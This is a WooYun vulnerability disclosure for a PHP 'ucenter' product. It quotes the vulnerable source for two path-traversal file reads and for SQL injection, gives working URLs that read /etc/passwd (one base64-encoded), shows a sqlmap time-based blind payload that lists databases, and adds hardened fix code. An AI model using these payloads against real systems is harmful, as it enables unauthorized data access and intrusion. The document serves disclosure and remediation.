WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
Disclosure timeline:
2015-07-17: Details sent to the vendor; awaiting vendor handling
2015-07-17: CNCERT (National Internet Emergency Center) could not reach the affected organization for now; details disclosed only to the reporting agency
2015-07-20: Details opened to third-party security partners
2015-09-10: Details opened to core white hats and relevant domain experts
2015-09-20: Details opened to regular white hats
2015-09-30: Details opened to intern white hats
2015-10-15: Details made public
No login required.

Arbitrary file read #1: see include/get_file.php
<?php
@set_time_limit(60);
// file_exists() only checks that the path exists; it does nothing to keep
// the path inside a download directory, so "../" sequences walk the filesystem.
if (isset($_GET['view']) && file_exists($_GET['view'])) {
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: attachment; filename=".basename($_GET['view']));
    readfile($_GET['view']);   // sends any file the web server user can read
} else if (isset($_GET['view'])) {
    echo $_GET['view']." 不能读取!";   // "cannot be read!"
}
?>
Read directly:
/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
Arbitrary file read #2: tjbb/webmail_raw.php
<?php
function _striptext($document)
{
    $search  = array("'<script[^>]*?>[^(document.getElementById)].*?</script>'si");
    $replace = array("");
    $text = preg_replace($search, $replace, $document);
    return $text;
}
echo "<div align=\"center\" style=\"color:#FF0000;\" > <img border=\"0\" src=\"../images/bianmachange.gif\"/></div><hr size=\"1\" />";
// The path is base64-decoded straight from the query string and then read
// with no directory containment check; base64 is an encoding, not a control.
$file = base64_decode($_GET['path']);
if (file_exists($file)) {
    echo file_get_contents($file);
} else {
    echo "文件不存在";   // "file does not exist"
}
?>
Just base64_encode the path (the value below decodes to ../../../../../../../etc/passwd):
/ucenter/tjbb/webmail_raw.php?path=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
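Added example (this is not code from the product or from the report): one download handler that fixes both file-read issues above. It accepts either the raw `view` parameter of get_file.php or the base64 `path` parameter of webmail_raw.php, resolves the request against a fixed download root with realpath(), and serves the file only if the canonical path is still inside that root. The directory DOWNLOAD_ROOT and the function name resolve_download are assumptions for illustration.

```php
<?php
// Hardened replacement for include/get_file.php and tjbb/webmail_raw.php.
// DOWNLOAD_ROOT is an assumed location; adjust per deployment.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/ucenter/data/downloads';

/**
 * Resolve a user-supplied relative path against $root and return the canonical
 * absolute path only if it stays inside $root and names a regular file;
 * otherwise return null.
 */
function resolve_download(string $root, string $requested): ?string
{
    // Reject empty input, NUL bytes (path truncation on old PHP) and absolute paths.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses "../" and resolves symlinks, so a path that escapes
    // the root no longer carries the root as its prefix.
    $target = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Stand-alone check when run from the command line: a constructed temporary
// root with one file, then the traversal payloads from the report.
if (PHP_SAPI === 'cli') {
    $root = sys_get_temp_dir() . '/dl_demo_' . getmypid();
    mkdir($root, 0700);
    file_put_contents($root . '/report.txt', "ok\n");
    var_dump(resolve_download($root, 'report.txt') !== null);                  // allowed
    var_dump(resolve_download($root, '../../../../../../../etc/passwd'));      // blocked
    var_dump(resolve_download($root, (string)base64_decode('Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='))); // blocked
    unlink($root . '/report.txt');
    rmdir($root);
    exit;
}

// Web request handling: both parameter styles end up in the same containment check.
$requested = null;
if (isset($_GET['view'])) {
    $requested = (string)$_GET['view'];
} elseif (isset($_GET['path'])) {
    $decoded = base64_decode((string)$_GET['path'], true);   // strict: reject non-base64
    $requested = $decoded === false ? null : $decoded;
}

$file = $requested === null ? null : resolve_download(DOWNLOAD_ROOT, $requested);
if ($file === null) {
    http_response_code(404);
    exit('File not found');
}

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($file)) . '"');
header('Content-Length: ' . (string)filesize($file));
readfile($file);
```

The prefix comparison runs on the realpath() result, not on the raw input, so encoded dots, repeated slashes and symlinks inside the root are all normalized before the decision is made. The `../../../../../../../etc/passwd` payload resolves to /etc/passwd, which does not start with the root prefix and is therefore refused; a symlink planted inside the root that points outside it is refused for the same reason.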
SQL injection: ucenter/admin/wsconfig.php (note that this script includes ./authorize.php; the report does not discuss whether that check applies or can be bypassed)
<?php
header("Content-Type:text/html;charset=GB2312");
session_start();
include("../include/globalvar.h");
include("../include/connectdb.php");
include("./authorize.php");
include("../include/printerror.php");
include("../include/addsystemlog.php");
include("../include/sendcmd.php");

if ($_GET['act'] == "Edt") {
    $sql = "SELECT * FROM up_status_property WHERE id=".$_GET['id'];   // injection 1: id concatenated unquoted
    $gDb->query($sql);
    $gDb->next_record();
    $callbackurl = $gDb->Record['callbackurl'];
    $verifyid = $gDb->Record['verifyid'];
    $valid_time = $gDb->Record['valid_time'];
    $valid_time = substr($valid_time, 0, strpos($valid_time, " "));   // keep the date part only
    $actionurl = "wsconfig.php?act=Edt&id=".$_GET['id'];
} else if ($_GET['act'] == "Add") {
    $html = "\t\t<tr>\n\t\t\t<td height=\"35\" align=\"right\" class=\"btd\">本地/远程:</td>\n\t\t\t<td class=\"btd\"><select name=\"local_or_remote\"><option value=\"0\">本地</option><option value=\"1\" selected>远程</option></select> <font color=\"#FF0000\">*</font></td>\n\t\t</tr>";
    $actionurl = "wsconfig.php?act=Add";
}

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if ($_GET['act'] == "Edt") {
        // injection 2: every POST field and the GET id are concatenated into the UPDATE
        $sql = "UPDATE up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."' WHERE id=".$_GET['id'];
        $gDb->query($sql);
        printerror("WEBSERVICE配置修改成功!", "sysinfo.php?kind=webservice");
    } else if ($_GET['act'] == "Add") {
        // same pattern on the INSERT; flag is taken unquoted from local_or_remote
        $sql = "INSERT INTO up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."', flag=".$_POST['local_or_remote'];
        $gDb->query($sql);
        printerror("WEBSERVICE配置添加成功!", "sysinfo.php?kind=webservice");
    }
}

// Form output (stored values are echoed back without escaping).
// Note: $actionurl is not echoed into the form action in the decompiled source.
echo "\n<LINK href=\"css/common.css\" type=\"text/css\" rel=\"stylesheet\">\n";
echo "<SCRIPT LANGUAGE=\"JavaScript\" src=\"../include/common.js\"></SCRIPT>\n<form name=\"wsForm\" method=\"POST\" action=\"";
echo "\" onsubmit=\"return verifyInput();\">\n<table width=\"100%\" border=0>\n\t";
echo $html;
echo " <tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">授权码: </td>\n\t\t<td class=\"btd\"><input type=\"text\" name=\"verifyid\" value=\"";
echo $verifyid;
echo "\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">有效期: </td>\n\t\t<td class=\"btd\"><input type='text' name='valid_time' onclick=\"onselectdate(this.form.valid_time);return false;\" readonly size=\"10\" value=\"";
echo $valid_time;
echo "\" class=\"bbox\" size=\"13\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"85\" align=\"right\" class=\"btd\">回调地址: </td>\n\t\t<td class=\"btd\"><textarea name=\"callbackurl\" cols=\"50\" rows=\"4\">";
echo $callbackurl;
echo "</textarea> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" class=\"btd\"></td>\n\t\t<td>\n\t\t\t<input type=\"submit\" name=\"sub\" value=\"保 存\">\n\t\t\t<input type=\"button\" name=\"ret\" value=\"返 回\" onclick=\"window.location='sysinfo.php?kind=webservice'\"> \n\t\t</td>\n\t</tr>\n</table>\n</form>\n";
echo "<script language=\"javascript\">\n<!--\nfunction verifyInput()\n{\n\tif(!killspace(document.wsForm.verifyid.value))\n\t{\n\t\talert(\"授权码不能为空!\");\n\t\tdocument.wsForm.verifyid.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.valid_time.value))\n\t{\n\t\talert(\"有效期不能为空!\");\n\t\tdocument.wsForm.valid_time.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.callbackurl.value))\n\t{\n\t\talert(\"回调地址不能为空!\");\n\t\tdocument.wsForm.callbackurl.focus();\n\t\treturn false;\n\t}\n}\n//-->\n</script>\n";
?>
The sqlmap run below targets admin/addswitchmanage.php, a different admin script whose source is not shown in this report, rather than wsconfig.php:

sqlmap.py -u "**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1" -p "id" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: act=E&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [9]:
[*] `#mysql50#ucenter_08-12-26-17-21-57OURCE`
[*] cluster
[*] information_schema
[*] mysql
[*] ucenter
[*] ucenter_big_tables
[*] ucenter_gbk_bak
[*] ucenter_org
[*] ucenter_other_tables
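Added example (not code from the product or the report): the act=Edt path of wsconfig.php rewritten so that neither injection point survives. The id is validated as a positive integer, valid_time is validated as a YYYY-MM-DD date before the fixed time is appended, and every value is bound through PDO prepared statements instead of being concatenated into the SQL text. The table and column names are those in the vulnerable code above; the PDO DSN, credentials and the helper names (connect, parse_id, parse_date, load_property, update_property) are assumptions for illustration.

```php
<?php
// Hardened act=Edt handling for wsconfig.php. DSN and credentials are assumed.
declare(strict_types=1);

function connect(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=ucenter;charset=utf8mb4', 'ucenter', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Server-side prepares: bound values never become part of the SQL text.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

/** id must be a positive integer; "1 AND (SELECT ...)" is rejected before any query runs. */
function parse_id($raw): int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('invalid id');
    }
    return $id;
}

/** The form sends YYYY-MM-DD; enforce that, then append the fixed time of day. */
function parse_date(string $raw): string
{
    $d = DateTime::createFromFormat('!Y-m-d', $raw);
    // Round-trip check rejects overflowing dates such as 2015-02-30.
    if ($d === false || $d->format('Y-m-d') !== $raw) {
        throw new InvalidArgumentException('invalid date');
    }
    return $raw . ' 23:59:59';
}

function load_property(PDO $pdo, int $id): ?array
{
    $st = $pdo->prepare('SELECT callbackurl, verifyid, valid_time FROM up_status_property WHERE id = :id');
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function update_property(PDO $pdo, int $id, string $callbackurl, string $verifyid, string $validTime): int
{
    $st = $pdo->prepare(
        'UPDATE up_status_property SET callbackurl = :cb, verifyid = :vid, valid_time = :vt WHERE id = :id'
    );
    $st->bindValue(':cb', $callbackurl);
    $st->bindValue(':vid', $verifyid);
    $st->bindValue(':vt', $validTime);
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    return $st->rowCount();
}

// Request handling for act=Edt; the Add branch follows the same pattern with an INSERT.
if (($_GET['act'] ?? '') === 'Edt') {
    $pdo = connect();
    $id  = parse_id($_GET['id'] ?? '');
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        update_property(
            $pdo,
            $id,
            (string)($_POST['callbackurl'] ?? ''),
            (string)($_POST['verifyid'] ?? ''),
            parse_date((string)($_POST['valid_time'] ?? ''))
        );
    }
    $row = load_property($pdo, $id);
    // When rendering $row back into the form, pass each value through
    // htmlspecialchars(); the original echoes them into attribute values unescaped.
}
```

With emulated prepares disabled the MySQL server receives the statement and the parameters separately, so the `AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)` payload cannot reach the parser at all; parse_id() rejects it even earlier, which keeps the time-based probe from costing a database round trip.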
Affected instances:
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-07-17 16:25
CNVD confirmed the reported issue and has notified the software vendor through the public contact information on its website.
Vendor response: none yet.